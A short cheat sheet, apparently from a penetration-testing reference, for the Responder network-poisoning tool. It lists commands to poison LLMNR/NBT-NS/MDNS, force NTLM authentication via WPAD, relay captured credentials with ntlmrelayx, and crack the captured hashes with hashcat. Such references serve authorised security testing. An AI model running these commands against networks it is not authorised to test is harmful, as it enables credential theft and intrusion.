Description
Responder is a LLMNR, NBT-NS, and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers. It captures NTLMv1/v2 hashes and supports credential relay attacks.
Installation
BASH
sudo apt install responder
# Or from source
git clone https://github.com/lgandx/Responder && cd ResponderBasic Usage
BASH
# Start poisoning
sudo responder -I eth0 -dwv
# Analyze mode (no poisoning, just listen)
sudo responder -I eth0 -A
# With WPAD proxy
sudo responder -I eth0 -wFAdvanced Usage
BASH
# Force NTLM auth via WPAD
sudo responder -I eth0 -wFbv
# Disable SMB/HTTP for relay (use with ntlmrelayx)
# Edit Responder.conf: SMB=Off, HTTP=Off
sudo responder -I eth0 -dwv
# Combine with ntlmrelayx
sudo responder -I eth0 -dwv --disable-ess
impacket-ntlmrelayx -tf targets.txt -smb2support
# Crack captured hashes
hashcat -m 5600 hashes.txt rockyou.txt # NTLMv2
hashcat -m 5500 hashes.txt rockyou.txt # NTLMv1Common Workflows
BASH
# Quick credential capture
sudo responder -I eth0 -dwv
# Wait for DNS/LLMNR/NBT-NS queries...
# Hashes saved in /opt/Responder/logs/
hashcat -m 5600 /opt/Responder/logs/*.txt rockyou.txt